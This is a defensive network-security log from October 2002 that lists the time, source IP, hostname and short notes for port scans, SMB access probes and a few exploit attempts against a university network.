Short summary of some of the attacks against us for Oct. 2002

year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes
2002/10/04-09:04:42.81 61.177.253.63 (CHINANET jiangsu province yancheng city network,CN) scannet for SMB C access
2002/10/04-10:08:08.32 200.222.159.69 (latin america/caribbean ??) scannet for SMB C access
2002/10/04-11:42:37.87 80.132.56.119 (p50843877.dip.t-dialin.net) scannet for SMB C access
2002/10/04-12:56:39.42 62.70.42.57 (ABSnet ISP AS, NO) scannet for SMB C access
2002/10/04-12:57:39.99 209.187.166.88 (C-COR.net,Suwannee GA,US) scannet for port 1433
2002/10/04-13:32:36.18 200.206.182.147 (200-206-182-147.dsl.telesp.net.br) scannet for SMB C access
2002/10/04-14:01:47.01 200.214.83.123 (nrjo03-1123.dial.rjo.embratel.net.br) scannet for SMB C access
2002/10/04-19:56:44.73 211.140.138.12 (China Mobile Communications Corporation,CN) scannet for port 21
2002/10/05-04:02:52.27 210.78.143.171 (263 network group company in china,CN) scannet for port 111
2002/10/05-05:09:12.70 217.136.48.110 (.48-136-217.adsl.skynet.be) scannet for ports 139,445,80
2002/10/05-05:46:55.87 210.78.143.171 (263 network group company in china,CN) probe port 111 on specific machines
2002/10/05-10:14:17.69 141.150.69.195 (client-141-150-69-195.ba-dsg.net) scannet for port 515
2002/10/05-11:09:27.40 218.17.220.25 (SHENZHEN DAQU COMPUTER CO.LTD,CN) scannet for ports 21
2002/10/05-11:38:09.11 148.246.81.109 (Instituto Tecnologico y de Estudios Superiores de Monterrey,MX) scannet for port 1433
2002/10/05-22:20:36.68 209.132.175.147 (dsl1a-147.ccrtc.com) scannet for port 137,139,445
2002/10/06-00:00:52.43 172.182.131.154 (ACB6839A.ipt.aol.com) scannet for port 21
2002/10/06-01:47:25.82 61.252.162.30 (Korea Crap) scannet for port 111
2002/10/06-04:01:55.94 148.243.153.130 (na-148-243-153-130.na.avantel.net.mx) scannet for port 1433
2002/10/06-09:14:35.83 211.156.161.185 (Guangdong Belton Telecommunications Technology Development Co.,Ltd.,CN) scannet port 21
2002/10/06-19:28:49.40 61.177.255.115 (CHINANET jiangsu province yancheng city network,CN) scannet for SMB C access
2002/10/06-20:06:52.51 80.116.76.129 (host129-76.pool80116.interbusiness.it) scannet for port 21
2002/10/06-21:05:14.11 128.6.225.205 (mburton.engr.rutgers.edu) scannet for port 135 = pound on port 445 on various ips
2002/10/06-23:54:08.35 195.250.107.103 (Zrenjanin City Council,YU) scannet for port 1433
2002/10/07-03:04:14.56 213.23.20.159 (dsl-213-023-020-159.arcor-ip.net) scannet for port 57,80
2002/10/07-03:05:49.19 132.203.148.224 (Universite Laval,CA) scannet for port 135
2002/10/07-07:27:03.94 213.4.13.230 (213-4-13-230.uc.nombres.ttd.es) scannet port 1433
2002/10/07-09:23:27.38 200.46.91.197 (197-91-46-200-ip.alianzaviva.net) scannet port 1433
2002/10/07-10:27:14.04 202.159.75.41 (PT. Bhakti Wasantara Net,JAKARTA,ID) scannet - NETBIOS SMB C access
2002/10/07-10:28:03.39 202.159.75.41 () scannet port 139
2002/10/07-10:28:14.77 61.177.247.11 () scannet port 139
2002/10/07-10:30:50.20 195.130.233.59 (janashop2.tiscalinet.it) RPC EXPLOIT statdx attack
2002/10/07-10:31:04.24 195.130.233.59 (janashop2.tiscalinet.it) scannet port 111
2002/10/07-12:41:04.65 12.15.122.67 (c5800-10-bis.p067.btigate.com) scannet - NETBIOS SMB C access
2002/10/07-12:53:36.12 12.15.122.67 (c5800-10-bis.p067.btigate.com) scannet port 139
2002/10/07-17:23:47.25 64.200.239.130 () scannet port 1433
2002/10/07-18:01:15.08 212.175.170.66 () scannet port 443
2002/10/07-18:22:07.98 206.53.3.80 (80-3-53-206.wor.ma.nevd.net) scannet port 1433
2002/10/07-18:43:05.59 65.31.65.131 (rrcs-central-65-31-65-131.biz.rr.com) scannet - NETBIOS SMB C access
2002/10/07-18:43:15.61 65.31.65.131 (rrcs-central-65-31-65-131.biz.rr.com) scannet port 139
2002/10/07-22:13:53.60 61.177.246.50 (CHINANET jiangsu province yancheng city network,CN) scannet - NETBIOS SMB C access
2002/10/07-23:22:31.46 65.94.85.229 (MTL-HSE-ppp165637.qc.sympatico.ca) scannet port 80, 139
2002/10/08-07:57:17.08 61.177.246.82 (CHINANET jiangsu province yancheng city network,CN) scannet NETBIOS SMB C access
2002/10/08-08:17:42.11 216.64.162.15 (scud.netriver.net-Vancouver WA) scannet for port 1433,1080,5800
2002/10/08-08:20:05.88 65.219.46.94 (cd/City of Ridgecrest,CA,US) scannet NETBIOS SMB C access
2002/10/08-08:47:52.82 217.97.134.25 (Ergis S.A.,Wabrzezno,PL) scannet NETBIOS SMB C access
2002/10/08-08:59:37.62 61.177.247.193 (CHINANET jiangsu province yancheng city network,CN) scannet NETBIOS SMB C access
2002/10/08-09:05:09.96 206.48.144.114 (DIALNET S.A,SANTAGO,CL) scannet for port 1433
2002/10/08-09:14:36.75 200.196.106.4 (UnUSED.linkexpress.com.br) scannet NETBIOS SMB C access
2002/10/08-09:27:30.84 12.149.217.142 (CONSOLIDATED DELIVERY AN,NY,NY,US) scan net NETBIOS SMB C access
2002/10/08-09:48:18.22 194.230.245.213 (pop-ls-9-5-1-dialup-213.freesurf.ch) scan net NETBIOS SMB C access
2002/10/08-10:46:01.15 61.177.247.45 (CHINANET jiangsu province yancheng city network,CN) scannet NETBIOS SMB C access
2002/10/08-12:46:58.57 213.99.95.33 (213-99-95-33.uc.nombres.ttd.es) scannet NETBIOS SMB C access
2002/10/08-12:52:50.50 64.162.6.210 (adsl-64-162-6-210.dsl.sktn01.pacbell.net) scannet NETBIOS SMB C access
2002/10/08-12:58:45.72 67.202.18.247 (2Cust247.tnt1.kansas-city.mo.da.uu.net) scannet NETBIOS SMB C access
2002/10/08-13:25:55.74 211.253.87.34 (KWUNIV-HO,KANGWON,KR) scannet NETBIOS SMB C access
2002/10/08-14:06:37.63 217.195.193.200 (pm3-3-42.dial.teklan.net-TURKEY) scannet NETBIOS SMB C access
2002/10/08-14:46:50.66 80.198.40.238 (0x50c628ee.albnxx9.adsl-dhcp.tele.dk) scannet ports 6112,443,buff overflow attack-CDE dtspcd
2002/10/08-14:47:40.62 64.231.55.109 (HSE-Toronto-ppp301049.sympatico.ca) scannet NETBIOS SMB C access
2002/10/08-14:51:50.42 217.96.165.52 (pl52.luzyckie.sdi.tpnet.pl) scannet NETBIOS SMB C access
2002/10/08-15:21:02.39 211.62.49.20 (Korea Telecom Hitel Co.,Ltd.,SEOUL,KR) scannet for port 1433
2002/10/08-19:39:37.24 68.81.127.39 (pcp01335924pcs.fairmt01.pa.comcast.net) scannet for port 1433
2002/10/08-19:47:32.97 212.194.15.38 (lns02m-4-38.w.club-internet.fr) scannet for port 21
2002/10/08-20:00:45.86 64.214.150.187 (64-214-150-187.roc.frontiernet.net) scannet for port 445
2002/10/08-20:08:09.81 212.244.181.91 (zsp2ustrzyki.edu.pl) scannet for port 1433
2002/10/08-20:54:44.77 61.177.253.149 (CHINANET jiangsu province yancheng city network,CN) scannet NETBIOS SMB C access
2002/10/08-21:16:21.92 216.187.81.70 (www.datacrafters.net=Vancouver BC) scannet for port 1433
2002/10/09-00:20:24.48 61.177.255.31 (CHINANET jiangsu province yancheng city network,CN) scannet NETBIOS SMB C access
2002/10/09-03:10:16.23 62.22.47.10 (Avantis Barcelona Spain) scannet for port 1433
2002/10/09-04:02:01.31 61.177.255.52 (CHINANET jiangsu province yancheng city network,CN) scannet NETBIOS SMB C access
2002/10/09-06:20:47.76 210.94.133.45 (Korea crap) scannet NETBIOS SMB C access
2002/10/09-06:26:24.99 61.177.255.41 (CHINANET jiangsu province yancheng city network,CN) scannet NETBIOS SMB C access
2002/10/09-07:26:54.02 61.177.255.51 (CHINANET jiangsu province yancheng city network,CN) scannet NETBIOS SMB C access
2002/10/09-08:59:49.58 128.238.129.104 (Polytechnic University,Broklyn,NY,NY) scan net for NETBIOS SMB C access
2002/10/09-09:14:17.08 61.177.255.51 (CHINANET jiangsu province yancheng city network) scan net for NETBIOS SMB C access
2002/10/09-10:04:08.52 200.24.76.13 (El Portal da InternetSA,Bogota, CO) scan net for NETBIOS SMB C access
2002/10/09-11:50:08.45 209.13.207.138 (FOR2ppp-10.uc.infovia.com.ar) scan net for NETBIOS SMB C access
2002/10/09-15:25:12.72 61.177.253.154 (CHINANET jiangsu province yancheng city network) scan net for NETBIOS SMB C access
2002/10/09-15:30:41.56 164.77.219.250 (ENTEL CHILE S.A.,SANTIAGO,CL) scan net for NETBIOS SMB C access
2002/10/09-16:26:19.80 209.212.135.188 (for 188.reverse.hellsouth.com) probe 132.235.4.21 ports 1080,23
2002/10/09-16:34:16.75 217.39.39.155 (host217-39-39-155.in-addr.btopenworld.com) scan net for NETBIOS SMB C access
2002/10/09-17:13:55.48 195.92.254.207 (ppd-com-01.whoc.theplanet.co.uk) scannet for port 1433
2002/10/09-23:18:00.74 164.107.215.115 (rsco-164-107-215-115.resnet.ohio-state.edu) scannet for port 137,445,139
2002/10/10-01:11:18.50 61.177.253.112 (CHINANET jiangsu province yancheng city network) scan net for NETBIOS SMB C access
2002/10/10-07:24:23.21 212.202.170.132 () scannet for port 80 57 51169 21
2002/10/10-08:04:09.80 61.200.136.197 () scannet for port 139
2002/10/10-09:15:03.64 62.45.7.74 () scannet for port 139
2002/10/10-10:02:07.08 200.45.223.81 () scannet for port 139
2002/10/10-10:46:59.29 211.92.141.222 () scannet for port 139
2002/10/10-11:07:48.67 200.60.198.129 () scannet for port 139
2002/10/10-11:13:58.77 61.177.253.112 () scannet for port 139
2002/10/10-11:16:50.83 193.249.19.50 () scannet for port 139
2002/10/10-11:28:51.18 61.145.213.214 () scannet for port 139
2002/10/10-12:15:14.67 194.54.59.77 () scannet for port 139
2002/10/10-13:35:25.10 140.109.227.28 () scannet for port 139
2002/10/10-14:07:40.48 207.30.21.85 () scannet for port 139
2002/10/10-14:26:19.13 65.191.163.117 () scannet for port 139 445
2002/10/10-14:37:20.70 61.38.215.104 () scannet for port 139
2002/10/10-16:04:36.92 130.67.102.214 () scannet for port 139
2002/10/10-16:16:33.28 212.1.153.61 (dial-212-1-153-61.access.uk.tiscali.com) scannet with ICMP superscan echo
2002/10/10-16:17:30.23 212.1.153.61 () scannet for port 139 1433
2002/10/10-18:48:16.59 65.104.67.55 () scannet for port 139
2002/10/10-19:16:34.10 199.243.160.47 () scannet for port 139
2002/10/10-19:21:18.08 200.244.59.28 () scannet for port 139
2002/10/10-20:55:42.36 66.33.0.181 () scannet for port 1080
2002/10/10-21:16:47.13 210.182.17.212 () scannet for port 139
2002/10/10-21:34:57.36 24.156.247.118 () scannet for port 445
2002/10/11-04:16:14.68 65.191.203.161 () scannet for port 1433
2002/10/11-09:03:36.88 61.34.192.246 () scannet for port 139
2002/10/11-09:14:42.87 192.117.198.166 (Bezek-Adsl-vpdn-poolIP-198-166.adsl.israsrv.net.il) hacked 132.235.19.79 & setup ftp server
2002/10/11-09:16:02.67 61.177.253.121 () scannet for port 139
2002/10/11-10:05:28.16 212.171.6.224 () scannet for port 139
2002/10/11-10:15:02.16 24.95.146.111 () scannet for port 139
2002/10/11-11:12:31.36 218.149.22.71 () scannet for port 139
2002/10/11-11:14:03.84 80.9.135.137 () scannet for port 139
2002/10/11-11:14:30.08 200.204.73.70 () scannet for port 139
2002/10/11-12:17:48.55 216.10.178.164 () scannet for port 139
2002/10/11-13:12:48.58 61.230.54.169 () scannet for port 139
2002/10/11-13:26:30.56 132.235.4.24 () scannet for port 139
2002/10/11-14:21:18.09 211.158.6.15 () scannet for port 80 443
2002/10/11-14:44:05.12 200.249.19.250 () scannet for port 139
2002/10/11-15:04:01.18 217.96.218.135 () scannet for port 139
2002/10/11-15:21:32.53 217.0.98.243 () scannet for port 80 57 21
2002/10/11-15:34:17.42 200.207.88.77 () scannet for port 139
2002/10/11-15:36:24.78 63.170.142.3 () scannet for port 139
2002/10/11-15:43:13.29 64.217.135.210 () scannet for port 139
2002/10/11-16:00:41.59 193.82.2.11 () scannet for port 139 445
2002/10/11-16:37:25.44 193.212.165.187 () scannet for port 445 139
2002/10/11-19:15:29.44 208.177.157.114 () scannet for port 21
2002/10/11-21:21:59.52 24.90.190.122 () scannet for port 25 3128 80 8080 1080
2002/10/12-02:40:13.19 211.179.244.139 () scannet for port 1433
2002/10/12-12:07:35.83 148.246.64.35 () scannet for port 79
2002/10/12-16:15:48.80 216.255.44.105 () scannet for port 1433
2002/10/12-16:37:47.77 66.191.8.193 () scannet for port 1433
2002/10/12-17:07:58.28 208.208.208.35 () scannet for port 139 445
2002/10/12-19:18:49.51 217.81.152.223 (pD95198DF.dip.t-dialin.net) hack 132.235.19.193 and setup ftp server
2002/10/12-20:11:32.76 80.56.192.30 () scannet for port 111 445 80 135 1433 21 23
2002/10/12-23:18:22.21 209.86.161.223 () scannet for port 80 445
2002/10/12-23:43:30.32 216.236.151.85 () scannet for port 1433
2002/10/13-01:02:30.95 209.86.161.223 () scannet for port 80 445
2002/10/13-02:21:29.98 80.56.192.30 (f192030.upc-f.chello.nl) scannet with ICMP superscan echo
2002/10/13-11:22:51.91 217.185.187.227 () scannet for port 1433
2002/10/13-11:25:12.77 212.179.97.238 () scannet for port 139 445 80
2002/10/13-16:09:54.03 213.213.142.62 () scannet for port 1433
2002/10/13-17:22:29.34 24.154.166.209 () scannet for port 139 445 80
2002/10/13-17:39:17.72 24.154.166.209 () scannet for port 80 445 139
2002/10/13-17:44:50.22 216.12.213.9 (Everyones Internet, Inc.,TX,US) EXPLOIT CDE dtspcd exploit attempt
2002/10/13-17:44:56.85 216.12.213.9 () scannet for port 1524 6112
2002/10/13-19:45:59.72 213.220.74.47 () scannet for port 22
2002/10/13-21:26:06.24 65.191.200.93 () scannet for port 80 445 139
2002/10/13-22:18:48.10 66.245.35.84 () scannet for port 445 80 139
2002/10/13-22:26:07.69 65.191.200.93 () scannet for port 139 80 445
2002/10/13-22:35:02.31 66.245.35.84 () scannet for port 445 139
2002/10/14-02:45:22.11 203.100.246.116 (dyn116.mel3.homedsl.pacific.net.au) hack 132.235.19.98
2002/10/14-05:45:26.28 12.228.191.48 (12-228-191-48.client.attbi.com) scannet with ICMP superscan echo
2002/10/14-05:45:45.02 12.228.191.48 () scannet for port 1412
2002/10/14-07:27:43.89 24.123.46.10 (rrcs-central-24-123-46-10.biz.rr.com) RPC EXPLOIT statdx on 132.235.4.63
2002/10/14-08:04:00.70 24.123.46.10 () scannet for ports 111 -NETBIOS SMB C access
2002/10/14-08:32:06.68 199.74.164.28 () scannet for ports 1433
2002/10/14-08:33:10.66 213.17.208.153 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-09:32:17.56 218.0.136.2 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-09:39:19.13 199.174.181.171 () scannet for ports 139
2002/10/14-13:27:12.34 151.199.47.95 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-15:33:33.44 198.79.20.163 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-15:53:45.48 207.44.137.241 (Everyones Internet,HOUSTON TX US) send windows popup with ad for diploma factory
2002/10/14-17:17:27.35 200.204.197.72 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-17:23:46.34 63.230.208.51 () scannet for ports 1433 -NETBIOS SMB C access
2002/10/14-19:09:59.50 24.191.91.29 (ool-18bf5b1d.dyn.optonline.net) scan net for ports 445,139,80 - >1500 times /ip
2002/10/14-20:31:19.60 63.170.119.144 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-20:58:06.51 141.150.69.195 () scannet for ports 515
2002/10/14-22:20:00.57 218.51.183.82 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-22:42:31.43 64.247.66.56 (dhcp-064-247-066-056.sg1.ohiou.edu) portscan p1
2002/10/14-23:06:25.38 211.230.32.162 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-23:29:46.81 218.90.34.159 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-23:47:11.26 200.158.4.225 () scannet for ports 139 -NETBIOS SMB C access
2002/10/14-23:47:20.75 216.68.15.165 () scannet for ports 139 -NETBIOS SMB C access
2002/10/15-03:45:09.54 203.241.249.137 () scannet for ports 139 -NETBIOS SMB C access
2002/10/15-04:11:58.43 217.126.101.155 () scannet for ports 139 -NETBIOS SMB C access
2002/10/15-04:38:19.59 132.235.17.239 (andouille.ent.ohiou.edu) running an xdcc server for several days now....
2002/10/15-06:08:50.59 211.130.239.153 () scannet for ports 139 -NETBIOS SMB C access
2002/10/15-06:42:46.96 62.248.2.173 () scannet for ports 139 -NETBIOS SMB C access
2002/10/15-08:12:52.75 212.69.224.89 (ids.vital.co.uk) scannet for port(s) 443 80
2002/10/15-10:26:29.28 213.84.3.96 (a213-84-3-96.adsl.xs4all.nl) scannet for port(s) 443 80
2002/10/15-10:58:08.61 200.223.23.23 (ppp18.provyder.com.br) scannet for ports 139 -NETBIOS SMB C access
2002/10/15-10:58:33.08 200.223.23.23 (ppp18.provyder.com.br) scannet for port(s) 139
2002/10/15-11:34:12.75 200.168.19.86 (200-168-19-86.dsl.telesp.net.br) scannet for ports 139 -NETBIOS SMB C access
2002/10/15-11:34:16.99 200.168.19.86 (200-168-19-86.dsl.telesp.net.br) scannet for port(s) 139
2002/10/15-12:14:14.30 62.11.129.74 (ppp-62-11-129-74.dialup.tiscali.it) scannet for port(s) 1433
2002/10/15-12:39:14.51 213.154.70.146 () scannet for port(s) 80 443
2002/10/15-13:41:19.53 200.68.173.93 (cr2006817393.cable.net.co) scannet for ports 139 -NETBIOS SMB C access
2002/10/15-13:41:24.71 200.68.173.93 (cr2006817393.cable.net.co) scannet for port(s) 139
2002/10/15-14:15:02.08 200.55.9.250 (Inst.Mov.de F.coop,BuenosAris, AR) scannet for ports 139 -NETBIOS SMB C access
2002/10/15-14:15:09.23 200.55.9.250 () scannet for port(s) 139
2002/10/15-14:40:27.43 199.247.235.216 () scannet for port(s) 1433
2002/10/15-15:08:27.53 202.108.254.200 (CHINANET Beijing province networkm,CN) scannet for port 1080
2002/10/15-15:35:55.66 216.177.177.158 (ip-216-177-177-158.dynamic-cpe.cable.gvtc.com) ICMP superscan echo of net
2002/10/15-15:40:09.25 216.177.177.158 (ip-216-177-177-158.dynamic-cpe.cable.gvtc.com) scannet for port(s) 139 80 445
2002/10/15-15:43:27.41 208.179.252.25 (25-252-179-208.pajo.com) scannet for ports 139 -NETBIOS SMB C access
2002/10/15-15:43:51.98 208.179.252.25 (25-252-179-208.pajo.com) scannet for port(s) 139
2002/10/15-16:24:18.39 148.245.171.231 (na-171-231.na.avantel.net.mx) scannet for ports 139 -NETBIOS SMB C access
2002/10/15-16:25:55.45 148.245.171.231 (na-171-231.na.avantel.net.mx) scannet for port(s) 139
2002/10/15-16:45:10.85 24.29.151.147 (24-29-151-147.nyc.rr.com) scannet for port(s) 80
2002/10/15-17:14:55.05 213.169.172.224 (ip-172-224.evhr.net) scannet for port(s) 21
2002/10/15-18:17:36.89 209.212.135.188 (188.reverse.hellsouth.com) scannet for port 1080
2002/10/15-18:30:19.66 195.232.62.18 (fra-tgn-ozd-vty18.as.wcom.net) scannet for port(s) 21
2002/10/15-20:01:45.50 62.243.188.160 (0x3ef3bca0.kd4nxx6.adsl-dhcp.tele.dk) scannet for ports 139 -NETBIOS SMB C access
2002/10/15-21:39:23.24 66.30.34.248 (amak.ne.client2.attbi.com) scannet for port(s) 445
2002/10/15-21:43:44.55 212.67.212.103 () scannet for port(s) 22
2002/10/15-22:13:50.47 216.85.178.226 (e.spire Communications, Inc.,STERLING,VA,US) probe port 139 on 132.235.4.65 -NETBIOS SMB C access
2002/10/15-22:41:18.84 210.243.184.155 (h155-210-243-184.seed.net.tw) probe port 139 on 132.235.4.65 -NETBIOS SMB C access
2002/10/15-22:47:08.53 61.77.84.229 (KYONGGI,KR) probe port 139 on 132.235.4.65 -NETBIOS SMB C access
2002/10/15-22:51:54.15 217.230.116.43 (pD9E6742B.dip.t-dialin.net) scannet for port(s) 80 21 57
2002/10/16-00:22:32.79 208.61.88.232 (adsl-61-88-232.mia.bellsouth.neT) scannet for port(s) 1369 ports
2002/10/16-00:34:04.12 208.61.88.232 (adsl-61-88-232.mia.bellsouth.net) ICMP superscan echo of net
2002/10/16-01:04:56.73 212.160.157.121 (Huta Minska,PL) scannet for port 8080
2002/10/16-01:05:02.00 212.160.157.121 () scannet for port(s) 8080
2002/10/16-02:24:27.41 213.25.233.182 (pa182.kalisz.sdi.tpnet.pl) scannet for port(s) 80 443
2002/10/16-03:36:58.25 67.227.10.138 (1Cust138.tnt1.san-fernando.ca.da.uu.net) ICMP superscan echo of net
2002/10/16-03:37:11.02 67.227.10.138 (1Cust138.tnt1.san-fernando.ca.da.uu.net) scannet for port(s) 25
2002/10/16-04:09:00.47 195.102.66.109 (host12.ngcardoch.u-net.com) scannet for port(s) 139
2002/10/16-04:19:56.66 212.191.4.17 (stacja17.swseiz.lodz.pl) scannet for port(s) 139
2002/10/16-07:17:49.73 193.127.14.36 () scannet for port(s) 1433
2002/10/16-13:27:47.23 61.61.121.208 () scannet for port 139 NETBIOS SMB C access
2002/10/16-13:47:45.01 213.97.224.4 () scannet for port 139 NETBIOS SMB C access
2002/10/16-13:48:38.52 209.90.142.20 () scannet for port 139 NETBIOS SMB C access
2002/10/16-14:26:19.87 24.232.193.169 () scannet for port 139 NETBIOS SMB C access
2002/10/16-14:42:02.98 210.111.114.6 () scannet for port 139 NETBIOS SMB C access
2002/10/16-15:09:23.20 217.209.209.110 (h110n2fls32o804.telia.com) 1. portscan all ips on net, then probe multiple ports
2002/10/16-15:09:23.20 217.209.209.110 (h110n2fls32o804.telia.com) 2. (try to login as root via ftp, etc)
2002/10/16-23:36:06.73 146.115.5.131 () scannet for port 445 135
2002/10/16-23:37:10.10 146.115.5.133 () scannet for port 445
2002/10/17-01:37:38.43 140.140.1.8 () scannet for port 139
2002/10/17-10:38:09.48 194.79.172.139 (FUTURE SOFT,FRANCE) scannet for port 443
2002/10/17-21:06:03.86 211.217.158.218 (Korea Telecom,SEOUL,KR) attack 132.235.4.18 via MS ports
2002/10/18-03:36:37.47 217.209.209.110 (h110n2fls32o804.telia.com) 1. portscan MULTIPLE ips, multiple attacks on ftp,finger. etc.
2002/10/18-03:36:37.47 217.209.209.110 (h110n2fls32o804.telia.com) 2. DNS version probe, ETC until 09:41:20.32
2002/10/18-04:09:06.54 142.179.168.151 (aji251m1y52aa.ab.hsia.telus.net) scannet for port 139
2002/10/18-08:39:02.43 217.209.209.110 () scannet for ports 161 ports
2002/10/18-09:02:54.43 205.151.64.15 () scannet for ports 139
2002/10/18-10:15:09.07 65.189.150.133 (dsl-65-189-150-133.telocity.com) attack 132.235.4.202 via MS ports thru 10:44
2002/10/18-10:30:46.76 65.40.197.208 (user208.net512.nj.sprint-hsd.net) multiple probes to 132.235.1.7 ports 5280 5281
2002/10/18-11:46:28.01 148.235.82.181 () scannet for ports 139
2002/10/18-11:59:55.29 68.32.75.172 () scannet for ports 80
2002/10/18-12:56:25.22 24.245.9.6 () scannet for ports 1433
2002/10/18-13:08:27.65 151.26.89.25 () scannet for ports 139
2002/10/18-14:24:03.67 143.248.8.22 () scannet for ports 139 445
2002/10/18-14:26:59.55 80.135.164.32 () scannet for ports 139
2002/10/18-14:31:58.30 65.189.150.133 (dsl-65-189-150-133.telocity.com) attack 132.235.4.7 via MS ports thru 14:59:50.
2002/10/18-14:48:26.72 24.208.183.130 () scannet for ports 20 ports
2002/10/18-14:50:16.34 143.248.8.109 () scannet for ports 139 445
2002/10/18-15:26:22.32 200.243.63.195 () scannet for ports 139
2002/10/18-15:56:43.14 143.248.68.184 () scannet for ports 139 445
2002/10/18-16:41:25.30 143.248.138.160 () scannet for ports 139 445
2002/10/18-17:01:56.56 81.48.69.127 () scannet for ports 139 135 445
2002/10/18-18:12:55.37 152.7.25.209 () scannet for ports 445
2002/10/18-18:33:19.71 130.91.29.212 () scannet for ports 1433
2002/10/18-21:08:29.99 66.108.184.106 () scannet for ports 445
2002/10/18-22:09:36.42 24.185.60.177 () scannet for ports 445
2002/10/18-22:55:46.43 24.192.11.49 () scannet for ports 445
2002/10/19-00:41:32.89 207.32.140.31 () scannet for ports 445 139
2002/10/19-00:42:02.88 207.32.140.120 () scannet for ports 445
2002/10/19-00:42:20.17 207.32.140.228 () scannet for ports 445 139
2002/10/19-00:48:24.35 143.248.206.176 () scannet for ports 139 445
2002/10/19-01:03:14.52 24.188.7.217 () scannet for ports 445
2002/10/19-01:20:42.22 212.254.136.112 () scannet for ports 57
2002/10/19-02:40:49.02 207.153.26.65 () scannet for ports 139
2002/10/19-02:57:49.70 130.39.45.236 () scannet for ports 139 445
2002/10/19-03:40:56.21 12.218.240.113 (12-218-240-113.client.mchsi.com) 1. portscan multiple IPs - ports 80 445 3128 3389 6588 7616
2002/10/19-03:40:56.21 12.218.240.113 (12-218-240-113.client.mchsi.com) 2. 8000 9076 9088 , icmp echo scan
2002/10/19-03:41:18.42 12.218.240.113 (12-218-240-113.client.mchsi.com) ICMP superscan echo of net
2002/10/19-03:42:06.34 12.218.240.113 () scannet for ports 3128 445 80 3389 9088 etc
2002/10/19-05:18:11.58 61.221.104.33 () scannet for ports 80
2002/10/19-05:53:27.37 168.191.184.172 () scannet for ports 4480 8080 3128 6588 1080 80
2002/10/19-06:22:53.42 65.25.76.167 () scannet for ports 445 139 80
2002/10/19-06:32:29.80 129.219.144.21 (astro.la.asu.edu) attack 132.235.4.201:139 to get ADMIN$ C$ D$ access
2002/10/19-06:50:22.20 80.129.61.88 (p50813D58.dip.t-dialin.net) ICMP echo scan of net
2002/10/19-06:52:11.56 212.199.253.38 (IL-GOLDENLINES,IL) run ftp server on 132.235.19.98 via microsoft sql security hole
2002/10/19-08:35:43.32 211.238.207.36 (ACETECH,SEOUL,KR) scan net with RPC portmap request status
2002/10/19-08:36:01.84 211.238.207.36 () scannet for ports 111
2002/10/19-08:40:17.59 64.214.150.187 () scannet for ports 445
2002/10/19-08:40:21.91 66.119.34.39 () scannet for ports 80
2002/10/19-09:27:37.44 150.67.48.116 () scannet for ports 80 21 57
2002/10/19-10:48:40.40 140.109.40.233 () scannet for ports 139 445
2002/10/19-10:59:10.55 129.170.43.228 () scannet for ports 445 139
2002/10/19-12:37:36.27 24.191.18.199 () scannet for ports 445 139
2002/10/19-12:52:50.18 24.188.236.230 () scannet for ports 445
2002/10/19-12:53:27.83 64.251.82.200 () scannet for ports 445 139
2002/10/19-12:59:33.80 62.5.147.241 () scannet for ports 80
2002/10/19-14:37:04.35 208.171.232.229 () scannet for ports 1433
2002/10/19-14:40:54.94 24.93.102.1 () scannet for ports 31 ports
2002/10/19-14:47:50.27 66.147.217.179 () scannet for ports 80
2002/10/19-16:05:50.43 12.226.44.67 () scannet for ports 445
2002/10/19-16:07:49.13 12.231.168.197 () scannet for ports 445
2002/10/19-16:48:28.88 131.210.4.168 () scannet for ports 1433
2002/10/19-17:07:56.22 24.192.183.153 () scannet for ports 445
2002/10/19-20:21:33.76 24.45.35.37 () scannet for ports 445 139
2002/10/19-20:25:41.20 64.162.177.195 () scannet for ports 139 445 80
2002/10/19-20:38:09.13 195.218.191.115 () scannet for ports 80
2002/10/19-20:39:14.17 143.248.203.219 () scannet for ports 445 139
2002/10/19-21:11:20.11 194.151.97.66 () scannet for ports 139
2002/10/19-21:15:41.63 24.192.29.43 () scannet for ports 445
2002/10/19-21:17:22.39 24.189.92.178 () scannet for ports 445 139
2002/10/19-21:27:04.06 24.191.92.216 () scannet for ports 445 139
2002/10/19-21:49:27.48 143.248.150.2 () scannet for ports 445
2002/10/19-21:54:29.59 24.191.161.9 () scannet for ports 139 445
2002/10/19-22:32:01.13 80.135.248.224 () scannet for ports 443 80
2002/10/19-22:36:14.53 131.94.143.75 () scannet for ports 445
2002/10/19-22:40:48.24 24.208.176.251 () scannet for ports 33 ports
2002/10/19-22:56:19.00 130.17.2.3 () scannet for ports 443
2002/10/19-23:18:22.38 140.109.225.2 () scannet for ports 139 445
2002/10/19-23:49:59.11 165.123.149.142 () scannet for ports 445 139
2002/10/19-23:53:39.33 80.129.113.136 () scannet for ports 21
2002/10/20-00:10:46.63 24.192.1.244 () scannet for ports 445
2002/10/20-00:21:33.66 143.248.125.61 () scannet for ports 139 445
2002/10/20-00:28:37.11 64.251.243.44 () scannet for ports 445 139
2002/10/20-02:38:26.72 129.107.70.8 () scannet for ports 80
2002/10/20-03:40:35.65 143.248.125.26 () scannet for ports 139 445
2002/10/20-03:47:10.59 143.248.125.26 () scannet for ports 445 139
2002/10/20-03:47:20.34 147.32.32.180 () scannet for ports 80
2002/10/20-07:17:15.48 213.245.220.230 () scannet for ports 21
2002/10/20-07:48:26.10 24.208.180.47 () scannet for ports 7 ports
2002/10/20-08:07:12.23 211.72.1.133 () scannet for ports 139 445
2002/10/20-08:51:26.91 24.187.245.92 () scannet for ports 139 445
2002/10/20-08:55:49.21 165.132.177.45 () scannet for ports 445
2002/10/20-08:59:28.62 141.223.203.161 () scannet for ports 445
2002/10/20-09:03:07.10 213.64.67.243 () scannet for ports 80
2002/10/20-09:10:42.71 217.209.209.110 () scannet for ports 445 139 multiple ports
2002/10/20-09:21:40.25 24.189.52.107 () scannet for ports 445
2002/10/20-09:26:28.55 4.60.135.173 () scannet for ports 445
2002/10/20-09:33:22.41 24.184.195.14 () scannet for ports 445
2002/10/20-09:37:21.71 24.47.99.179 () scannet for ports 139 445
2002/10/20-09:44:43.19 218.234.13.70 () scannet for ports 445
2002/10/20-09:59:58.62 208.62.70.14 () scannet for ports 139 445
2002/10/20-10:08:28.29 211.72.123.118 () scannet for ports 445
